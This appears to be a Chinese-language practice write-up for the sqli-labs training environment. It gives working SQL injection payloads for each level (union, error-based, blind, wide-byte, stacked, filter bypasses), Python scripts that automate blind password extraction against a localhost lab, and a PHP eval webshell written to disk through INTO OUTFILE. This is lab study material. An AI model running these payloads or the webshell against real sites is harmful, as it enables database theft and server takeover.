sqli-labs

之前的一些关于 sqli-labs 的练习

Less-1（单引号 union 注入）

?id=' union select 1,2,group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA = database()--+

?id=' union select 1,2,group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA = database() and TABLE_NAME = 'users'--+

?id=' union select 1,2,group_concat(password) from users--+

Less-2（无引号 union 注入）

?id=0 union select 1,2,group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA = database()--+

?id=0 union select 1,2,group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA = database() and TABLE_NAME = 'users'--+

?id=0 union select 1,2,group_concat(password) from users--+

Less-3（单引号括号 union 注入）

?id=') union select 1,2,group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA = database()--+

?id=') union select 1,2,group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA = database() and TABLE_NAME = 'users'--+

?id=') union select 1,2,group_concat(password) from users--+

Less-4（双引号 union 注入）

?id=") union select 1,2,group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA = database()--+

?id=") union select 1,2,group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA = database() and TABLE_NAME = 'users'--+

?id=") union select 1,2,group_concat(password) from users--+

Less-5（单引号双注入）

?id=1' union select 1,count(*),concat('~',(select table_name from information_schema.tables where table_schema=database() limit 3,1), '~',floor(rand()*2)) as a from information_schema.tables group by a--+

?id=1' union select 1,count(*),concat('~',(select column_name from  information_schema.columns where table_schema=database() and table_name='users' limit 2,1), '~',floor(rand()*2)) as a from information_schema.tables group by a--+

?id=1' union select 1,count(*),concat('~',(select password from  users limit 0,1), '~',floor(rand()*2)) as a from information_schema.tables group by a--+

Less-6（双引号双注入）

?id=1" union select 1,count(*),concat('~',(select table_name from information_schema.tables where table_schema=database() limit 3,1), '~',floor(rand()*2)) as a from information_schema.tables group by a--+

?id=1" union select 1,count(*),concat('~',(select column_name from  information_schema.columns where table_schema=database() and table_name='users' limit 2,1), '~',floor(rand()*2)) as a from information_schema.tables group by a--+

?id=1" union select 1,count(*),concat('~',(select password from  users limit 0,1), '~',floor(rand()*2)) as a from information_schema.tables group by a--+

Less-7（一句话木🐎）

@@datadir 读取数据库路径
@@basedir MYSQL 获取安装路径

?id=1')) union select 1,2,'<?php @eval($_POST["123"]); ?>' into outfile 'E:\\PHPTutorial\\WWW\\sqli-labs-master\\Less-7\\test.php'--+

上菜刀

Less-8（单引号布尔盲注）

import requests
import string

url = "http://localhost:8088/sqli-labs-master/Less-8/"
length = 0

'''
盲注结果：

|- security
    |- emails
    |- referers
    |- uagents
    |- users
        |- id
        |- username
        |- password
            |- Dumb
            |- ...
'''

def getLength():
    global length
    for i in range(2,11):
        #payload = "' or length(database())=" + str(i) + "#"
        #payload = "' or length((select table_name from information_schema.tables where table_schema=database() limit 4,1))=" + str(i) + "#"
        #payload = "' or length((select column_name from information_schema.columns where table_name='users' limit 2,1))=" + str(i) + "#"
        payload = "' or length((select password from users limit 0,1))=" + str(i) + "#"
        data = {
            'id':payload
        }
        r = requests.get(url,params=data)
        if "You are in" in r.text:
            length = i
            print("【+】 right length: " + str(i))
            break
        else:
            pass
            print("【*】 wrong length: " + str(i))

def getPayload():
    password = ""
    for i in range(1,length+1):
        left = ord('a')
        right = ord('z')
        while left != right:
            mid = int((left + right) / 2)
            #payload = "' or ASCII(mid(database()," + str(i) + ",1))>" + str(mid) + "#"
            #payload = "' or ASCII(mid((select table_name from information_schema.tables where table_schema=database() limit 4,1)," + str(i) + ",1))>" + str(mid) + "#"
            #payload = "' or ASCII(mid((select column_name from information_schema.columns where table_name='users' limit 2,1)," + str(i) + ",1))>" + str(mid) + "#"
            payload = "' or ASCII(mid((select password from users limit 0,1)," + str(i) + ",1))>" + str(mid) + "#"
            data = {
                'id':payload
            }
            r = requests.get(url,params=data)
            if "You are in" in r.text:
                left = mid + 1
                print(str(i) + " > " + chr(mid))
            else:
                right = mid
                print(str(i) + " <= " + chr(mid))
        password += chr(left)
        print("【+】 password: " + password)

if __name__ == "__main__":
    getLength()
    getPayload()

Less-9（单引号时间盲注）

import requests
import string

url = "http://localhost:8088/sqli-labs-master/Less-9/"
length = 0
letters = string.ascii_letters # lowercase

'''
盲注结果：

|- security
    |- emails
    |- referers
    |- uagents
    |- users
        |- id
        |- username
        |- password
            |- Dumb
            |- ...
'''

def getLength():
    global length
    for i in range(2,11):
        #payload = "' or if(length(database())=" + str(i) + ",sleep(4),1)#"
        #payload = "' or if(length((select table_name from information_schema.tables where table_schema=database() limit 3,1))=" + str(i) + ",sleep(4),1)#"
        #payload = "' or if(length((select column_name from information_schema.columns where table_name='users' limit 2,1))=" + str(i) + ",sleep(4),1)#"
        payload = "' or if(length((select password from users limit 0,1))=" + str(i) + ",sleep(4),1)#"
        data = {
            'id':payload
        }
        try:
            r = requests.get(url,params=data,timeout=3)
            print("【*】 present length: " + str(i))
        except requests.exceptions.ReadTimeout as e:
            length = i
            print("【+】 right length: " + str(i))
            break

def getPayload():
    password = ""
    for i in range(1,length+1):
        '''
        left = ord('a')
        right = ord('z')
        while left != right:
            mid = int((left + right) / 2)
            payload = "' or if(ASCII(mid(database()," + str(i) + ",1))>" + str(mid) + ",1,sleep(4))#"
            #payload = "' or ASCII(mid((select table_name from information_schema.tables where table_schema=database() limit 4,1)," + str(i) + ",1))>" + str(mid) + "#"
            #payload = "' or ASCII(mid((select column_name from information_schema.columns where table_name='users' limit 2,1)," + str(i) + ",1))>" + str(mid) + "#"
            #payload = "' or ASCII(mid((select password from users limit 1,1)," + str(i) + ",1))>" + str(mid) + "#"
            data = {
                'id':payload
            }
            try:
                r = requests.get(url,params=data,timeout=3)
                left = mid + 1
                print(str(i) + " > " + chr(mid))
            except requests.exceptions.ReadTimeout as e:
                right = mid
                print(str(i) + " <= " + chr(mid))
                
        password += chr(left)
        print("【+】 password: " + password)
        '''
        for j in letters:
            #payload = "' or if(ASCII(mid(database()," + str(i) + ",1))=" + str(ord(j)) + ",sleep(4),1)#"
            #payload = "' or if(ASCII(mid((select table_name from information_schema.tables where table_schema=database() limit 3,1)," + str(i) + ",1))=" + str(ord(j)) + ",sleep(4),1)#"
            #payload = "' or if(ASCII(mid((select column_name from information_schema.columns where table_name='users' limit 2,1)," + str(i) + ",1))=" + str(ord(j)) + ",sleep(4),1)#"
            payload = "' or if(ASCII(mid((select password from users limit 0,1)," + str(i) + ",1))=" + str(ord(j)) + ",sleep(4),1)#"
            data = {
                'id':payload
            }
            try:
                r = requests.get(url,params=data,timeout=3)
                print("【*】 present password: " + str(i) + " = " + j)
            except requests.exceptions.ReadTimeout as e:
                password += j
                print("【+】 password: " + password)
                break
                
if __name__ == "__main__":
    getLength()
    getPayload()

Less-10（双引号时间盲注）

1	Less-9 单引号改双引号

Less-11（用户名加密的单引号 union 注入）

uname = admin'#

' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'#

' union select 1,group_concat(password) from users#

Less-12（用户名加密的双引号括号 union 注入）

1
2
3

uname = admin")#

less-11 单引号改双引号括号

Less-13（用户名的单引号括号双注入）

admin') union select count(*),concat('~',(select table_name from information_schema.tables where table_schema=database() limit 3,1),'~',floor(rand()*2)) as a from information_schema.tables group by a#

admin') union select count(*),concat('~',(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 2,1),'~',floor(rand()*2)) as a from information_schema.tables group by a#

admin') union select count(*),concat('~',(select password from users limit 0,1),'~',floor(rand()*2)) as a from information_schema.tables group by a#

Less-14（用户名的双引号双注入）

1	less-13 单引号括号改双引号

Less-15（用户名的单引号布尔注入）

import requests
import string

url = "http://localhost:8088/sqli-labs-master/Less-15/"
length = 0

'''
盲注结果：

|- security
    |- emails
    |- referers
    |- uagents
    |- users
        |- id
        |- username
        |- password
            |- Dumb
            |- ...
'''

def getLength():
    global length
    for i in range(2,11):
        #payload = "admin' and length(database())=" + str(i) + "#"
        #payload = "admin' and length((select table_name from information_schema.tables where table_schema=database() limit 3,1))=" + str(i) + "#"
        #payload = "admin' and length((select column_name from information_schema.columns where table_name='users' limit 2,1))=" + str(i) + "#"
        payload = "admin' and length((select password from users limit 0,1))=" + str(i) + "#"
        data = {
            'uname':payload,
            'passwd':123
        }
        r = requests.post(url,data=data)
        if "flag.jpg" in r.text:
            length = i
            print("【+】 right length: " + str(i))
            print("--------------------------------------------")
            break
        else:
            print("【*】 wrong length: " + str(i))

def getPayload():
    password = ""
    for i in range(1,length+1):
        left = ord('A')
        right = ord('z')
        while left != right:
            mid = int((left + right) / 2)
            #payload = "admin' and ASCII(mid(database()," + str(i) + ",1))>" + str(mid) + "#"
            #payload = "admin' and ASCII(mid((select table_name from information_schema.tables where table_schema=database() limit 3,1)," + str(i) + ",1))>" + str(mid) + "#"
            #payload = "admin' and ASCII(mid((select column_name from information_schema.columns where table_name='users' limit 2,1)," + str(i) + ",1))>" + str(mid) + "#"
            payload = "admin' and ASCII(mid((select password from users limit 0,1)," + str(i) + ",1))>" + str(mid) + "#"
            data = {
                'uname':payload,
                'passwd':123
            }
            r = requests.post(url,data=data)
            if "flag.jpg" in r.text:
                left = mid + 1
                print(str(i) + " > " + chr(mid))
            else:
                right = mid
                print(str(i) + " <= " + chr(mid))
        password += chr(left)
        print("【+】 password: " + password)

if __name__ == "__main__":
    getLength()
    getPayload()

Less-16（用户名的双引号括号布尔注入）

Less-17（用户名加密的单引号报错注入）

Less-18（User-Agent 报错注入）

1	User-Agent: ' or updatexml(1,concat('~',(select table_name from information_schema where table_schema=database),'~'),1) or

Less-19（Referer 报错注入）

Less-20（User-Agent 报错注入）

上 burpsuite 修改 Cookie：

Cookie: uname=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#

Cookie: uname=' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'#

Cookie: uname=' union select 1,2,group_concat(password) from users#

Less-21（User-Agent 加密报错注入）

1	less-20 单引号改单引号括号再用 base64 加密

Less-22（User-Agent 加密报错注入）

1	less-20 单引号改双引号再用 base64 加密

Less-23 （过滤注释）

?id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() and '1

?id=' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' and '1

?id=' union select 1,2,group_concat(password) from users where ''='

Less-24 （二次排序漏洞）

1	先注册一个 admin'# 账号再修改 admin'# 的密码，新密码即为 admin 的密码。

Less-25 （过滤 or & and）

一次性关键词绕过 用 oorr 和 aandnd 绕过

?id=' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()--+

?id=' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_schema=database() aandnd table_name='users'--+

?id=' union select 1,2,group_concat(passwoorrd)  from users--+

Less-25a（过滤 or & and ）

1	表面上是盲注，背地里是 less-25 无引号的 union 注入...

Less-26 （过滤空格和注释的报错注入）

本题全部空格都过滤了，所以采取报错注入
or 用 || 代替，and 用 %26%26 代替（&&也过滤了）
注释则用 ||'1 闭合

?id='||updatexml(1,concat('~',(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database())),'~'),1)||'1

?id='||updatexml(1,concat('~',(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema=database())%26%26(table_name='user')),'~'),1)||'1

?id='||updatexml(1,concat('~',(select(group_concat(passwoorrd))from(users)),'~'),1)||'1

Less-26a（过滤空格和注释的布尔注入）

1	空格全部被过滤，此题又不能进行报错注入，所以采取布尔注入

Less-27 （过滤 nion 和 select 的 union 注入）

union 注入：
通过脚本可知空格可以用 %09、%0a-%0d 绕过
非一次性关键词绕过，union 和 select 用大小写 unioN 和 selecT 绕过

?id='%0AunioN%0AselecT%0A1,2,group_concat(table_name)%0Afrom%0Ainformation_schema.tables%0Awhere%0Atable_schema=database()%0Aand%0A'1

?id='%0AunioN%0AselecT%0A1,2,group_concat(column_name)%0Afrom%0Ainformation_schema.columns%0Awhere%0Atable_schema=database()%0Aand%0Atable_name='users'%0Aand%0A'1

?id='%0AunioN%0AselecT%0A1,2,group_concat(column_name)%0Afrom%0Ausers%0Awhere%0A'1
或者
?id='%0AunioN%0AselecT%0A1,(selecT%0Agroup_concat(password)%0Afrom%0Ausers),3%0A||'

报错注入：
其他与 less-26 类似

?id='||updatexml(1,concat('~',(selecT(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),'~'),1)||'1

?id='||updatexml(1,concat('~',(selecT(group_concat(column_name))from(information_schema.columns)where(table_schema=database())%26%26(table_name='users')),'~'),1)||'1

?id='||updatexml(1,concat('~',(selecT(group_concat(password))from(users)),'~'),1)||'1

Less-27a（过滤 nion 和 select 的时间盲注）

1 2	双引号 + 时间盲注其他同 less-27

Less-28（过滤 nion 和 select 的 union 注入）

1
2
3

有个小bug，网上的 payload 都是 union 注入，但是我的空格不能用 %a0 绕过...所以只好用布尔盲注

?id=1')and(ascii(mid(database(),1,1))=115)and('1')=('1

Less-28a（过滤 union 和 select 的布尔注入）

同 less-28

Less-29（WAF1）

这题是？？？签到题？？？

?id=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

?id=' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'--+

?id=' union select 1,group_concat(password),3 from users--+

Less-30（WAF2）

1	less-29 单引号改双引号

Less-31（WAF3）

1	less-29 单引号改双引号括号

Less-32（宽字节注入）

基于 get 方法的宽字节注入，加 %df 绕过

?id=%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

?id=%df' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'--+

?id=%df' union select 1,group_concat(password),3 from users--+

Less-33（宽字节注入）

同 less-32

Less-34（用户名和密码加反斜杠）

基于 post 的宽字节注入，又可以将 utf-8 转换为 utf-16 或 utf-32，例如将'转为 utf-16 为 %EF%BF%BD'/�'

万能密码 �' or 1# 不知道为什么我的电脑只有这个能用

admin=�' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()# 

admin=�' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273# 

admin=�' union select 1,group_concat(password) from users#

Less-35（加反斜杠没引号的 union 注入）

?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

?id=0 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'--+

?id=0 union select 1,group_concat(password),3 from users--+

Less-36（基于 get 的 mysql_real_escape_string() 函数的 union 注入）

同 less-32

Less-37（基于 post 的 mysql_real_escape_string() 函数的 union 注入）

同 less-34

Less-38（堆叠注入）

1
2
3

stacked injection：在mysql中，主要是命令行中，每一条语句结尾加 ; 表示语句结束。所以我们可以利用分号进行多聚输入。

?id=1';insert into users(id,username,password) values(15,'less38','less38') -- +

Less-39（堆叠注入）

1	?id=1;insert into users(id,username,password) values(16,'less39','less39') -- +

Less-40（堆叠注入）

1	?id=1');insert into users(id,username,password) values(17,'less40','less40') -- +

Less-41（堆叠注入）

1	同 less-39 区别于无报错信息

Less-42（堆叠注入）

1
2
3

用户名做了转义处理，可以对密码进行堆叠注入

login_user=1&login_password=1';create table less42 like users#

Less-43（堆叠注入）

1
2
3

类似 less-42，只是多了个括号

login_user=1&login_password=1');create table less43 like users#

Less-44（堆叠注入）

1	同 less-42 只是没有报错信息

Less-45（堆叠注入）

1	同 less-43 只是没有报错信息

Less-46（order by 注入）

此题可考虑报错注入和延时注入：
1. 直接添加注入语句，?sort=(select ******)；
2. 利用一些函数。例如rand()函数等。?sort=rand(sql语句)，对比rand(ture)和rand(false)的结果，可以判断是否注入成功；
3. 利用and，例如?sort=1 and (加sql语句)。

报错注入：

?sort=1 and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~'))--+

?sort=1 and extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),'~'))--+

?sort=1 and extractvalue(1,concat('~',(select group_concat(password) from users),'~'))--+

延时注入例子 :

http://127.0.0.1/sqli-labs-master/Less-46/?sort=(SELECT IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,md5('1')),null) FROM (select database() as current) as tb1)

http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 and If(ascii(substr(database(),1,1))=116,0,sleep(5))

Less-47 （order by 注入）

1	类似 less-46 只是多了一个单引号

Less-48（order by 盲注）

类似 less-46 无报错信息，所以需要盲注
如：
?sort=1 and if(length(database())=8,sleep(4),1)--+
?sort=1 and if(ascii(left(database(),1))=115,sleep(4),1)--+

Less-49（order by 盲注）

1	类似 less-48 多了一个单引号

Less-50（order by 堆叠注入）

这题使用 mysqli_multi_query 函数，所以可以执行多个语句。

?sort=1;create table less50 like users -- +
/?sort=1;insert into users(id,username,password)value(18,'less50','less50')#

Less-51（order by 堆叠注入）

1	类似 less-50 多了一个单引号

Less-52（order by 堆叠注入）

1	同 less-50 没有了注释

Less-53（order by 堆叠注入）

1	同 less-51 没有了注释

Less-54（挑战1）

1	依旧是字符型注入，只不过只有十次机会，密码就在 secret 列名里面

Less-55（挑战2）

1	类似 less-54 加了一个括号

Less-56（挑战3）

1	类似 less-54 加了一个单引号括号

Less-57（挑战4）

1	类似 less-54 加了一个双引号

Less-58（挑战5）

1	union 注入失败，但是可以进行报错注入，这次是单引号型的

Less-59（挑战6）

1	类似 less-58 这次是纯数字型

Less-60（挑战7）

1	类似 less-58 这次是双引号括号型的

Less-61（挑战8）

1	类似 less-58 这次真的猜不出...原来是单引号加两层括号...

Less-62（挑战9）

1 2	单引号括号型，但是 union 注入和报错注入已经失效，页面信息也没有变化所以只能进行时间盲注